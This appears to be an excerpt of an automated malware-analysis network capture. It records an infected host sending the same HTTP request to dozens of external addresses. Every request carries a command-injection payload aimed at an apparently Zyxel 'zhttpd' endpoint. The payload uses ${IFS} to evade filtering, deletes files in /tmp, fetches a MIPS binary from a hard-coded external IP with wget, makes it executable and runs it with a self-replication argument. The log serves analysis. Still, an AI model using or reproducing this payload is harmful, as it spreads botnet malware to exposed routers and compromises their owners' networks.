                                          Jan 14, 2024 15:46:23.131567955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6024192.168.2.234602090.97.24.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131596088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6025192.168.2.2344486107.58.68.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131633997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6026192.168.2.235342659.6.34.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131655931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6027192.168.2.234019263.111.242.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131684065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6028192.168.2.235051861.192.3.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131692886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6029192.168.2.2340670190.144.222.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131725073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6030192.168.2.2353668150.28.148.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131741047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6031192.168.2.2345666189.152.16.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131757975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6032192.168.2.2333792200.94.196.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131799936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6033192.168.2.2341756106.180.152.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131820917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6034192.168.2.2345834120.87.12.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131855011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6035192.168.2.2359686172.41.45.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131895065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6036192.168.2.2343570153.143.40.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131911039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6037192.168.2.233742471.127.145.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131970882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6038192.168.2.23409469.78.206.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131987095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6039192.168.2.233831668.214.53.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132021904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6040192.168.2.2357790153.95.94.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132040977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6041192.168.2.2341278120.222.247.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132057905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6042192.168.2.235532045.50.217.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132076025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6043192.168.2.2346854216.225.236.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132118940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6044192.168.2.235930842.115.29.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132138014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6045192.168.2.235428865.221.226.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132165909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6046192.168.2.235402899.149.102.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132186890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6047192.168.2.236012482.37.227.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132210016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6048192.168.2.2341712147.241.222.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132224083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6049192.168.2.2340450201.50.21.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132256031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6050192.168.2.233579646.174.32.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132282019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6051192.168.2.233932892.117.14.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132311106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6052192.168.2.2355026148.192.235.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132343054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6053192.168.2.2333430154.146.182.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132371902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6054192.168.2.2352004164.166.31.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132404089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6055192.168.2.235808282.128.118.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132446051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6056192.168.2.233829023.110.187.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132468939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6057192.168.2.2346820145.81.94.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132482052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6058192.168.2.2348724110.143.69.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132514954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6059192.168.2.2348884109.213.99.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132515907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6060192.168.2.23349981.101.132.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132539034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6061192.168.2.2342898171.115.237.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132558107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6062192.168.2.234736297.181.95.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132591009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6063192.168.2.2345986204.151.37.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132631063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6064192.168.2.2338556213.245.231.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132643938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6065192.168.2.2345060131.100.13.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132692099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6066192.168.2.2356360212.248.92.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132693052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6067192.168.2.2341400133.151.107.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132730007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6068192.168.2.233303850.148.11.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132749081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6069192.168.2.2357912128.111.126.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132793903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6070192.168.2.234399299.30.220.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132818937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6071192.168.2.233966865.152.129.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132848024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6072192.168.2.2349120217.212.243.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132870913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6073192.168.2.2340730125.74.57.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132900000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6074192.168.2.2337722212.123.120.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132930994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6075192.168.2.2339526158.206.68.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132941961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6076192.168.2.2351136151.207.66.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132961988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6077192.168.2.2356672133.91.195.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.132978916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6078192.168.2.23591184.1.137.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133002043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6079192.168.2.233571834.40.142.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133032084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6080192.168.2.235949861.17.176.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133066893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6081192.168.2.233988268.134.193.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133100986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6082192.168.2.234875874.90.25.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133126020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6083192.168.2.234370851.68.217.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133147001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6084192.168.2.2349468165.91.191.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133188963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6085192.168.2.2339592210.37.223.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133229971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6086192.168.2.2353066135.205.187.232443
                                          TimestampBytes transferredDirectionData
